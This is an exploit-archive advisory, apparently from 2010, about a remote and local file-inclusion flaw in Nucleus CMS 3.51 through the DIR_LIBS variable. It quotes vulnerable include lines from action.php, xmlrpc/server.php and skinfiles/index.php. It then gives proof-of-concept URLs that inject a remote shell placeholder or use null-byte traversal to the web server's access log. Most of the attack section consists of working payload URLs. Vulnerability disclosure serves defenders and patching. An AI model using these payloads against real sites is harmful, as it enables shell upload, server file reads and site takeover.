[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
# Published : 2010-04-14
# Author : eidelweiss
# Previous Title : Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability
# Next Title : RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities
########################################################
Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
########################################################
____ __ __ __
/ _` / __ / __/
L___ __ ___ /' /_ ___ __ ,_ ___ __
_/ / /'___ , < / /' _ ` /'_ ` / _ ` /'__`
/ _ / __/ \`\ / / / L _ / __/
_ ____/ ____\ _ _ _ _ _ ____ __\ _ _ ____
/_/ /___/ /____/ /_//_//_//_//_//___L /__/ /_//_//____/
/____/
_/__/
__ __ __ ______ Author:eidelweiss
/ __/ / / _
/ __ ____ L _____ _____ ____
/'__` '__` __ / '__`/ '__` /',__
_/ _ / __/ L / L L /__, `
`___x___/ ____\ _,__/ _ _ ,__/ ,__//____/
'/__//__/ /____/ /___/ /_//_/ / / /___/
_ _
/_/ /_/
[+]Software: Nucleus CMS
[+]Version: Nucleus v3.51 (Other or lower version may also be affected)
[+]License: GNU/GPL (Free Software)
[+]Homepage: http://nucleuscms.org/download.php
[+]Download: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
########################################################
[!]Discovered: eidelweiss
[!]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s: sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
########################################################
-=[Description]=-
Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)
########################################################
-=[VUln Code]=-
**********************************
[-][path_to_nucleus]/action.php
$CONF = array();
require('./config.php');
// common functions
include_once($DIR_LIBS . 'ACTION.php');
$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);
**********************************
[-][path_to_nucleus]/nucleus/xmlrpc/server.php
$CONF = array();
require("../../config.php"); // include Nucleus libs and code
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");
**********************************
[-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php
$strRel = '../../../';
require($strRel . 'config.php');
include($DIR_LIBS . 'PLUGINADMIN.php');
########################################################
-=[ P0C ]=-
Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]
Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
or
Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00
###############################=[E0F]=###################################